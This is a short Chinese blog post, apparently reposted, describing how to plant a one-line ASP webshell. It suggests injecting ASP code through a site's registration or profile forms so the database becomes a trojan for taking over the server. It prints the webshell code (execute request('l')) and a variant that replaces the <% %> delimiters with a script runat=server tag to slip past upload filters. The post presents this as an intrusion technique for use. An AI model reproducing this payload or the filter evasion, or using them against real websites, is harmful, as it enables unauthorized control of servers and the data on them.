一句话木马上传新方法 |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。
使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。
不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。
首先:原程序代码是“〈%execute request(“l”)%〉”, 我们可以把它的标签换下来。
然后改成”〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉”.。
这样就避开了使用〈%%〉,保存为.ASP,程序照样执行,效果是一样的

来自:

三年离歌博客

Tags:

一句话木马,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
一句话木马上传新方法 |